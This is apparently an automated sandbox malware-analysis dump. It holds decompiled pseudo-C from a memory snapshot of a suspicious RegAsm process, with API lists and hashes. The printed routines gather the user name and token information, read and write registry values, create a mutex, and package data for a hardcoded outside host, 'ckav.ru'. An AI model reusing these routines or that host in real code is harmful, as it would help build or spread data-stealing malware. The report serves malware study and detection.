                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$AllocCreateReadVirtual
                                                                                          • String ID: .tmp
                                                                                          • API String ID: 3585551309-2986845003
                                                                                          • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                                          • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                                                          • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                                          • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 79%
                                                                                          			E00413866(void* __eflags) {
                                                                                          				short _v6;
                                                                                          				short _v8;
                                                                                          				short _v10;
                                                                                          				short _v12;
                                                                                          				short _v14;
                                                                                          				short _v16;
                                                                                          				short _v18;
                                                                                          				short _v20;
                                                                                          				short _v22;
                                                                                          				char _v24;
                                                                                          				short _v28;
                                                                                          				short _v30;
                                                                                          				short _v32;
                                                                                          				short _v34;
                                                                                          				short _v36;
                                                                                          				short _v38;
                                                                                          				short _v40;
                                                                                          				short _v42;
                                                                                          				short _v44;
                                                                                          				short _v46;
                                                                                          				char _v48;
                                                                                          				short _v52;
                                                                                          				short _v54;
                                                                                          				short _v56;
                                                                                          				short _v58;
                                                                                          				short _v60;
                                                                                          				short _v62;
                                                                                          				short _v64;
                                                                                          				short _v66;
                                                                                          				short _v68;
                                                                                          				short _v70;
                                                                                          				short _v72;
                                                                                          				short _v74;
                                                                                          				char _v76;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* _t38;
                                                                                          				short _t43;
                                                                                          				short _t44;
                                                                                          				short _t45;
                                                                                          				short _t46;
                                                                                          				short _t47;
                                                                                          				short _t48;
                                                                                          				short _t50;
                                                                                          				short _t51;
                                                                                          				short _t52;
                                                                                          				short _t54;
                                                                                          				short _t55;
                                                                                          				intOrPtr* _t57;
                                                                                          				intOrPtr* _t59;
                                                                                          				intOrPtr* _t61;
                                                                                          				void* _t63;
                                                                                          				WCHAR* _t65;
                                                                                          				long _t68;
                                                                                          				void* _t75;
                                                                                          				short _t76;
                                                                                          				short _t78;
                                                                                          				short _t83;
                                                                                          				short _t84;
                                                                                          				short _t85;
                                                                                          
                                                                                          				E00402C6C(_t38);
                                                                                          				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                                                                                          				SetErrorMode(3); // executed
                                                                                          				_t43 = 0x4f;
                                                                                          				_v76 = _t43;
                                                                                          				_t44 = 0x4c;
                                                                                          				_v74 = _t44;
                                                                                          				_t45 = 0x45;
                                                                                          				_v72 = _t45;
                                                                                          				_t46 = 0x41;
                                                                                          				_v70 = _t46;
                                                                                          				_t47 = 0x55;
                                                                                          				_v68 = _t47;
                                                                                          				_t48 = 0x54;
                                                                                          				_t76 = 0x33;
                                                                                          				_t84 = 0x32;
                                                                                          				_t83 = 0x2e;
                                                                                          				_t78 = 0x64;
                                                                                          				_t85 = 0x6c;
                                                                                          				_v66 = _t48;
                                                                                          				_v52 = 0;
                                                                                          				_t50 = 0x77;
                                                                                          				_v48 = _t50;
                                                                                          				_t51 = 0x73;
                                                                                          				_v46 = _t51;
                                                                                          				_t52 = 0x5f;
                                                                                          				_v42 = _t52;
                                                                                          				_v28 = 0;
                                                                                          				_t54 = 0x6f;
                                                                                          				_v24 = _t54;
                                                                                          				_t55 = 0x65;
                                                                                          				_v20 = _t55;
                                                                                          				_v64 = _t76;
                                                                                          				_v62 = _t84;
                                                                                          				_v60 = _t83;
                                                                                          				_v58 = _t78;
                                                                                          				_v56 = _t85;
                                                                                          				_v54 = _t85;
                                                                                          				_v44 = _t84;
                                                                                          				_v40 = _t76;
                                                                                          				_v38 = _t84;
                                                                                          				_v36 = _t83;
                                                                                          				_v34 = _t78;
                                                                                          				_v32 = _t85;
                                                                                          				_v30 = _t85;
                                                                                          				_v22 = _t85;
                                                                                          				_v18 = _t76;
                                                                                          				_v16 = _t84;
                                                                                          				_v14 = _t83;
                                                                                          				_v12 = _t78;
                                                                                          				_v10 = _t85;
                                                                                          				_v8 = _t85;
                                                                                          				_v6 = 0;
                                                                                          				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                                                                          				 *_t57( &_v76);
                                                                                          				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                                                                          				 *_t59( &_v48);
                                                                                          				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                                                                          				_t81 =  &_v24;
                                                                                          				 *_t61( &_v24); // executed
                                                                                          				_t63 = E00414059(); // executed
                                                                                          				if(_t63 != 0) {
                                                                                          					_t65 = E00413D97(0);
                                                                                          					E004031E5(0, 0, 0xcf167df4, 0, 0);
                                                                                          					CreateMutexW(0, 1, _t65); // executed
                                                                                          					_t68 = GetLastError();
                                                                                          					_t92 = _t68 - 0xb7;
                                                                                          					if(_t68 == 0xb7) {
                                                                                          						E00413B81(0);
                                                                                          						_pop(_t81); // executed
                                                                                          					}
                                                                                          					E00413003(_t92); // executed
                                                                                          					E00412B2E(_t92); // executed
                                                                                          					E00412D31(_t81, _t84); // executed
                                                                                          					E00413B3F();
                                                                                          					E00413B81(0);
                                                                                          					 *0x49fdd0 = 1;
                                                                                          				}
                                                                                          				return 0;
                                                                                          			}































































                                                                                          0x0041386f
                                                                                          0x0041387e
                                                                                          0x00413885
                                                                                          0x00413889
                                                                                          0x0041388c
                                                                                          0x00413890
                                                                                          0x00413893
                                                                                          0x00413897
                                                                                          0x0041389a
                                                                                          0x0041389e
                                                                                          0x004138a1
                                                                                          0x004138a5
                                                                                          0x004138a8
                                                                                          0x004138ac
                                                                                          0x004138af
                                                                                          0x004138b2
                                                                                          0x004138b5
                                                                                          0x004138b8
                                                                                          0x004138bb
                                                                                          0x004138bc
                                                                                          0x004138c4
                                                                                          0x004138c8
                                                                                          0x004138cb
                                                                                          0x004138cf
                                                                                          0x004138d2
                                                                                          0x004138d6
                                                                                          0x004138d7
                                                                                          0x004138df
                                                                                          0x004138e3
                                                                                          0x004138e4
                                                                                          0x004138ea
                                                                                          0x004138eb
                                                                                          0x004138f1
                                                                                          0x004138f5
                                                                                          0x004138f9
                                                                                          0x004138fd
                                                                                          0x00413901
                                                                                          0x00413905
                                                                                          0x00413909
                                                                                          0x0041390d
                                                                                          0x00413911
                                                                                          0x00413915
                                                                                          0x00413919
                                                                                          0x0041391d
                                                                                          0x00413921
                                                                                          0x00413925
                                                                                          0x00413929
                                                                                          0x0041392d
                                                                                          0x00413931
                                                                                          0x00413935
                                                                                          0x00413939
                                                                                          0x0041393d
                                                                                          0x00413941
                                                                                          0x00413950
                                                                                          0x00413959
                                                                                          0x0041395f
                                                                                          0x00413968
                                                                                          0x0041396e
                                                                                          0x00413973
                                                                                          0x00413977
                                                                                          0x00413979
                                                                                          0x00413980
                                                                                          0x00413982
                                                                                          0x00413991
                                                                                          0x0041399c
                                                                                          0x0041399e
                                                                                          0x004139a4
                                                                                          0x004139a9
                                                                                          0x004139ac
                                                                                          0x004139b1
                                                                                          0x004139b1
                                                                                          0x004139b2
                                                                                          0x004139b7
                                                                                          0x004139bc
                                                                                          0x004139c1
                                                                                          0x004139c7
                                                                                          0x004139cd
                                                                                          0x004139cd
                                                                                          0x004139db

                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                                          • CreateMutexW.KERNEL32(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                                          • GetLastError.KERNEL32 ref: 0041399E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Error$CreateLastModeMutex
                                                                                          • String ID:
                                                                                          • API String ID: 3448925889-0
                                                                                          • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                                          • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                                                                                          				long _v8;
                                                                                          				void* _t7;
                                                                                          				long _t10;
                                                                                          				void* _t21;
                                                                                          				struct _OVERLAPPED* _t24;
                                                                                          
                                                                                          				_t14 = __ebx;
                                                                                          				_t24 = 0;
                                                                                          				_v8 = 0;
                                                                                          				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                                                                                          				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                                                                                          				_t21 = _t7;
                                                                                          				if(_t21 != 0xffffffff) {
                                                                                          					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                                                                                          					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                                                                                          					if(_t10 != 0xffffffff) {
                                                                                          						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                                                                                          						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                                                                                          						_t24 =  !=  ? 1 : 0;
                                                                                          					}
                                                                                          					E00403C40(_t21); // executed
                                                                                          				}
                                                                                          				return _t24;
                                                                                          			}








                                                                                          0x004042cf
                                                                                          0x004042d5
                                                                                          0x004042df
                                                                                          0x004042e2
                                                                                          0x004042f9
                                                                                          0x004042fb
                                                                                          0x00404300
                                                                                          0x0040430a
                                                                                          0x00404314
                                                                                          0x00404319
                                                                                          0x00404323
                                                                                          0x00404334
                                                                                          0x0040433b
                                                                                          0x0040433b
                                                                                          0x0040433f
                                                                                          0x00404344
                                                                                          0x0040434c

                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CreatePointerWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3672724799-0
                                                                                          • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                          • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                                                          • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                          • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 35%
                                                                                          			E00412D31(void* __ecx, void* __edi) {
                                                                                          				long _v8;
                                                                                          				intOrPtr _v12;
                                                                                          				intOrPtr _v16;
                                                                                          				intOrPtr _v20;
                                                                                          				char _v24;
                                                                                          				char _v40;
                                                                                          				void* __ebx;
                                                                                          				intOrPtr* _t10;
                                                                                          				void* _t11;
                                                                                          				void* _t25;
                                                                                          				void* _t26;
                                                                                          				void* _t27;
                                                                                          				void* _t31;
                                                                                          				void* _t33;
                                                                                          				void* _t35;
                                                                                          				void* _t53;
                                                                                          				char* _t57;
                                                                                          				void* _t58;
                                                                                          				void* _t61;
                                                                                          				void* _t64;
                                                                                          				void* _t65;
                                                                                          				intOrPtr* _t66;
                                                                                          				void* _t67;
                                                                                          				void* _t68;
                                                                                          				void* _t69;
                                                                                          				void* _t70;
                                                                                          				void* _t71;
                                                                                          				void* _t72;
                                                                                          				void* _t73;
                                                                                          
                                                                                          				_t53 = __ecx;
                                                                                          				_t10 =  *0x49fde0;
                                                                                          				_t68 = _t67 - 0x24;
                                                                                          				 *0x49fddc = 0x927c0;
                                                                                          				 *0x49fde4 = 0;
                                                                                          				_t75 = _t10;
                                                                                          				if(_t10 != 0) {
                                                                                          					L16:
                                                                                          					_push(1);
                                                                                          					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                                                                                          					_t61 = _t11;
                                                                                          					_t68 = _t68 + 0xc;
                                                                                          					if(_t61 != 0) {
                                                                                          						E004031E5(0, 0, 0xfcae4162, 0, 0);
                                                                                          						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                                                                                          					}
                                                                                          					L004067C4(0xea60); // executed
                                                                                          					_pop(_t53);
                                                                                          				} else {
                                                                                          					_push(__edi);
                                                                                          					 *0x49fde0 = E004056BF(0x2bc);
                                                                                          					E00413DB7(_t53, _t75,  &_v40);
                                                                                          					_t57 =  &_v24;
                                                                                          					asm("movsd");
                                                                                          					asm("movsd");
                                                                                          					asm("movsd");
                                                                                          					asm("movsd");
                                                                                          					E004058D4( *0x49fde0, 0x12);
                                                                                          					E004058D4( *0x49fde0, 0x28);
                                                                                          					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                                                                                          					_t69 = _t68 + 0x28;
                                                                                          					_t64 = E0040632F();
                                                                                          					_push(0);
                                                                                          					_push(1);
                                                                                          					if(_t64 == 0) {
                                                                                          						_push(0);
                                                                                          						_push( *0x49fde0);
                                                                                          						E00405872();
                                                                                          						_t70 = _t69 + 0x10;
                                                                                          					} else {
                                                                                          						_push(_t64);
                                                                                          						_push( *0x49fde0);
                                                                                          						E00405872();
                                                                                          						E00402BAB(_t64);
                                                                                          						_t70 = _t69 + 0x14;
                                                                                          					}
                                                                                          					_t58 = E00406130(_t57);
                                                                                          					_push(0);
                                                                                          					_push(1);
                                                                                          					_t77 = _t64;
                                                                                          					if(_t64 == 0) {
                                                                                          						_push(0);
                                                                                          						_push( *0x49fde0);
                                                                                          						_t25 = E00405872();
                                                                                          						_t71 = _t70 + 0x10; // executed
                                                                                          					} else {
                                                                                          						_push(_t58);
                                                                                          						_push( *0x49fde0);
                                                                                          						E00405872();
                                                                                          						_t25 = E00402BAB(_t58);
                                                                                          						_t71 = _t70 + 0x14;
                                                                                          					}
                                                                                          					_t26 = E004061C3(_t25, 0, _t77); // executed
                                                                                          					_t65 = _t26;
                                                                                          					_push(0);
                                                                                          					_push(1);
                                                                                          					if(_t65 == 0) {
                                                                                          						_push(0);
                                                                                          						_push( *0x49fde0);
                                                                                          						_t27 = E00405872();
                                                                                          						_t72 = _t71 + 0x10;
                                                                                          					} else {
                                                                                          						_push(_t65);
                                                                                          						_push( *0x49fde0);
                                                                                          						E00405872();
                                                                                          						_t27 = E00402BAB(_t65);
                                                                                          						_t72 = _t71 + 0x14;
                                                                                          					}
                                                                                          					_t66 = E00406189(_t27);
                                                                                          					_t79 = _t66;
                                                                                          					if(_t66 == 0) {
                                                                                          						E00405781( *0x49fde0, 0);
                                                                                          						E00405781( *0x49fde0, 0);
                                                                                          						_t73 = _t72 + 0x10; // executed
                                                                                          					} else {
                                                                                          						E00405781( *0x49fde0,  *_t66);
                                                                                          						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                                                                                          						E00402BAB(_t66);
                                                                                          						_t73 = _t72 + 0x14;
                                                                                          					}
                                                                                          					_t31 = E004063B2(0, _t53, _t79); // executed
                                                                                          					E004058D4( *0x49fde0, _t31); // executed
                                                                                          					_t33 = E004060BD(_t79); // executed
                                                                                          					E004058D4( *0x49fde0, _t33); // executed
                                                                                          					_t35 = E0040642C(_t79); // executed
                                                                                          					E004058D4( *0x49fde0, _t35);
                                                                                          					E004058D4( *0x49fde0, _v24);
                                                                                          					E004058D4( *0x49fde0, _v20);
                                                                                          					E004058D4( *0x49fde0, _v16);
                                                                                          					E004058D4( *0x49fde0, _v12);
                                                                                          					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                                                                                          					_t68 = _t73 + 0x48;
                                                                                          				}
                                                                                          				_t80 =  *0x49fde4;
                                                                                          				if( *0x49fde4 == 0) {
                                                                                          					_t10 =  *0x49fde0;
                                                                                          					goto L16;
                                                                                          				}
                                                                                          				return E00405695(_t53,  *0x49fde0);
                                                                                          			}
































                                                                                          0x00412d31
                                                                                          0x00412d34
                                                                                          0x00412d39
                                                                                          0x00412d3c
                                                                                          0x00412d49
                                                                                          0x00412d50
                                                                                          0x00412d52
                                                                                          0x00412f24
                                                                                          0x00412f24
                                                                                          0x00412f2b
                                                                                          0x00412f30
                                                                                          0x00412f32
                                                                                          0x00412f37
                                                                                          0x00412f41
                                                                                          0x00412f53
                                                                                          0x00412f53
                                                                                          0x00412f5b
                                                                                          0x00412f60
                                                                                          0x00412d58
                                                                                          0x00412d58
                                                                                          0x00412d63
                                                                                          0x00412d6c
                                                                                          0x00412d73
                                                                                          0x00412d7e
                                                                                          0x00412d7f
                                                                                          0x00412d80
                                                                                          0x00412d81
                                                                                          0x00412d82
                                                                                          0x00412d8f
                                                                                          0x00412da1
                                                                                          0x00412da6
                                                                                          0x00412dae
                                                                                          0x00412db0
                                                                                          0x00412db1
                                                                                          0x00412db5
                                                                                          0x00412dce
                                                                                          0x00412dcf
                                                                                          0x00412dd5
                                                                                          0x00412dda
                                                                                          0x00412db7
                                                                                          0x00412db7
                                                                                          0x00412db8
                                                                                          0x00412dbe
                                                                                          0x00412dc4
                                                                                          0x00412dc9
                                                                                          0x00412dc9
                                                                                          0x00412de2
                                                                                          0x00412de4
                                                                                          0x00412de5
                                                                                          0x00412de7
                                                                                          0x00412de9
                                                                                          0x00412e02
                                                                                          0x00412e03
                                                                                          0x00412e09
                                                                                          0x00412e0e
                                                                                          0x00412deb
                                                                                          0x00412deb
                                                                                          0x00412dec
                                                                                          0x00412df2
                                                                                          0x00412df8
                                                                                          0x00412dfd
                                                                                          0x00412dfd
                                                                                          0x00412e11
                                                                                          0x00412e17
                                                                                          0x00412e19
                                                                                          0x00412e1a
                                                                                          0x00412e1e
                                                                                          0x00412e37
                                                                                          0x00412e38
                                                                                          0x00412e3e
                                                                                          0x00412e43
                                                                                          0x00412e20
                                                                                          0x00412e20
                                                                                          0x00412e21
                                                                                          0x00412e27
                                                                                          0x00412e2d
                                                                                          0x00412e32
                                                                                          0x00412e32
                                                                                          0x00412e4b
                                                                                          0x00412e4d
                                                                                          0x00412e4f
                                                                                          0x00412e7e
                                                                                          0x00412e8a
                                                                                          0x00412e8f
                                                                                          0x00412e51
                                                                                          0x00412e59
                                                                                          0x00412e67
                                                                                          0x00412e6d
                                                                                          0x00412e72
                                                                                          0x00412e72
                                                                                          0x00412e92
                                                                                          0x00412e9e
                                                                                          0x00412ea3
                                                                                          0x00412eaf
                                                                                          0x00412eb4
                                                                                          0x00412ec0
                                                                                          0x00412ece
                                                                                          0x00412edc
                                                                                          0x00412eea
                                                                                          0x00412ef8
                                                                                          0x00412f0f
                                                                                          0x00412f14
                                                                                          0x00412f14
                                                                                          0x00412f17
                                                                                          0x00412f1d
                                                                                          0x00412f1f
                                                                                          0x00000000
                                                                                          0x00412f1f
                                                                                          0x00412f74

                                                                                          APIs
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                                                            • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                                                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$CreateFreeProcessThread_wmemset
                                                                                          • String ID: ckav.ru
                                                                                          • API String ID: 2915393847-2696028687
                                                                                          • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                                          • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                                                          • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                                          • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E0040632F() {
                                                                                          				char _v8;
                                                                                          				void* _t4;
                                                                                          				void* _t7;
                                                                                          				void* _t16;
                                                                                          
                                                                                          				_t16 = E00402B7C(0x208);
                                                                                          				if(_t16 == 0) {
                                                                                          					L4:
                                                                                          					_t4 = 0;
                                                                                          				} else {
                                                                                          					E0040338C(_t16, 0, 0x104);
                                                                                          					_t1 =  &_v8; // 0x4143e8
                                                                                          					_v8 = 0x208;
                                                                                          					_t7 = E00406069(_t16, _t1); // executed
                                                                                          					if(_t7 == 0) {
                                                                                          						E00402BAB(_t16);
                                                                                          						goto L4;
                                                                                          					} else {
                                                                                          						_t4 = _t16;
                                                                                          					}
                                                                                          				}
                                                                                          				return _t4;
                                                                                          			}







                                                                                          0x00406340
                                                                                          0x00406345
                                                                                          0x00406373
                                                                                          0x00406373
                                                                                          0x00406347
                                                                                          0x0040634f
                                                                                          0x00406354
                                                                                          0x00406357
                                                                                          0x0040635c
                                                                                          0x00406366
                                                                                          0x0040636d
                                                                                          0x00000000
                                                                                          0x00406368
                                                                                          0x00406368
                                                                                          0x00406368
                                                                                          0x00406366
                                                                                          0x0040637a

                                                                                          APIs
                                                                                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                          • _wmemset.LIBCMT ref: 0040634F
                                                                                            • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocateNameProcessUser_wmemset
                                                                                          • String ID: CA
                                                                                          • API String ID: 2078537776-1052703068
                                                                                          • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                                                          • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                                                          • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                                                          • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E0041284A(void* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, int _a20) {
                                                                                          				int _t7;
                                                                                          				void* _t8;
                                                                                          
                                                                                          				E004031E5(_t8, 2, 0xebb783d2, 0, 0);
                                                                                          				_t7 = SHRegSetPathW(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                          				return _t7;
                                                                                          			}





                                                                                          0x00412858
                                                                                          0x0041286c
                                                                                          0x0041286f

                                                                                          APIs
                                                                                          • SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Path
                                                                                          • String ID: 5,A
                                                                                          • API String ID: 2875597873-3842761921
                                                                                          • Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                                                                                          • Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
                                                                                          • Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                                                                                          • Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                                                                                          				int _t7;
                                                                                          				void* _t8;
                                                                                          
                                                                                          				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                                                                                          				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                          				return _t7;
                                                                                          			}





                                                                                          0x00406094
                                                                                          0x004060a8
                                                                                          0x004060ab

                                                                                          APIs
                                                                                          • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InformationToken
                                                                                          • String ID: IDA
                                                                                          • API String ID: 4114910276-365204570
                                                                                          • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                          • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                                                          • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                          • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 92%
                                                                                          			E00404A52(void* _a4, char* _a8, char* _a12) {
                                                                                          				void* _v8;
                                                                                          				int _v12;
                                                                                          				void* __ebx;
                                                                                          				char* _t10;
                                                                                          				long _t13;
                                                                                          				char* _t27;
                                                                                          
                                                                                          				_push(_t21);
                                                                                          				_t27 = E00402B7C(0x208);
                                                                                          				if(_t27 == 0) {
                                                                                          					L4:
                                                                                          					_t10 = 0;
                                                                                          				} else {
                                                                                          					E00402B4E(_t27, 0, 0x208);
                                                                                          					_v12 = 0x208;
                                                                                          					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                                                                                          					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                                                                                          					if(_t13 != 0) {
                                                                                          						E00402BAB(_t27);
                                                                                          						goto L4;
                                                                                          					} else {
                                                                                          						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                                                                                          						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                                                                                          						E00404A39(_v8); // executed
                                                                                          						_t10 = _t27;
                                                                                          					}
                                                                                          				}
                                                                                          				return _t10;
                                                                                          			}









                                                                                          0x00404a56
                                                                                          0x00404a65
                                                                                          0x00404a6a
                                                                                          0x00404ad1
                                                                                          0x00404ad1
                                                                                          0x00404a6c
                                                                                          0x00404a71
                                                                                          0x00404a79
                                                                                          0x00404a85
                                                                                          0x00404a9a
                                                                                          0x00404a9e
                                                                                          0x00404acb
                                                                                          0x00000000
                                                                                          0x00404aa0
                                                                                          0x00404aac
